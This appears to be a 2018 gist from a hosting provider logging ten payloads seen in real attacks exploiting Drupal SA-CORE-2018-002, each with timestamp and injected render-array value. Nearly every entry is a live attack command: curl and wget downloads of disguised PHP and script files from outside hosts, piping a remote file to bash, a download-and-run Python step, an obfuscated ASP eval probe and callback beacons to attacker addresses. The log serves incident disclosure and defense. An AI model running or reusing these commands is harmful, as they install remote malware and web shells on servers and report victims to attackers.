@Schnitzel Schnitzel/attacks.md
Last active Apr 16, 2018

Drupal SA-CORE-2018-002 attacks

Drupal SA-CORE-2018-002 attacks on amazee.io

Attack 1

First seen: April 13th 2018, 12:54:06

Array Key: #markup

Array Value:

curl -o config.php http://havio.pl/themes/themes.css

Attack 2

First seen: April 13th 2018, 04:07:38

Array Key: #markup

Array Value:

curl -s http://158.69.133.18:8220/logo8.jpg | bash -s

Attack 3

First seen: April 9th 2018, 02:07:00 UTC

Array Key: #

Array Value:

eval("Ex"&cHr(101)&"cute(""Server.ScriptTimeout=3600:On Error Resume Next:Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""->|""""):Ex"&cHr(101)&"cute(""""On Error Resume Next:""""&bd(""""44696D20533A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A533D224552524F523A2F2F2022264572722E4465736372697074696F6E3A4572722E436C6561723A456C73653A533D5365727665722E4D61707061746828222E2229266368722839293A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329"""")):Response.Write(""""|<-""""):Response.End"")")

Attack 4

First seen: April 12th 2018, 18:26:52 UTC

Array Key: #markup

Array Value:

wget http://37.1.206.18/pingpongx?host=www.domain.com -O /dev/null

Attack 5

First seen: April 12th 2018, 18:26:52 UTC

Array Key: #markup

Array Value:

echo "ahcBmgweGC"

Attack 6

First seen: April 12th 2018, 23:38:53 UTC

Array Key: #markup

Array Value:

python -c 'exec("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".decode("base64"))'; curl -s 'http://80.209.253.51/?d=www.domain.com' >/dev/null; wget 'http://80.209.253.51/?d=www.domain.com' -O /dev/null

Attack 7

First seen: April 13th 2018, 02:29:26 UTC

Array Key: #markup

Array Value:

curl -s 'http://80.209.253.51/?d=www.domain.com' >/tmp/mjs.py; wget 'http://80.209.253.51/?d=www.domain.com' -O /tmp/mjs.py; python /tmp/mjs.py

Attack 8

First seen: April 13th 2018, 06:35:41 UTC

Array Key: #markup

Array Value:

curl -o rhRfU.php http://mmsubtitles.co/fonts/aril.ttf

Attack 9

First seen: April 13th 2018, 20:18:30

Array Key: #markup

wget -O m.php http://wp.startreceive.tk/test/z/m.txt;chmod 777 /tmp/m.php;sed -i 's/ptptpt/"\/home\/bpw\/public_html\/"/g' /tmp/m.php;php -f /tmp/m.php;rm -f /tmp/m.php

Attack 10

First seen: April 13th 2018, 20:00:29

Array Key: #markup

wget -O /dev/null http://146.185.136.136/knock.php?target=http://domain.com/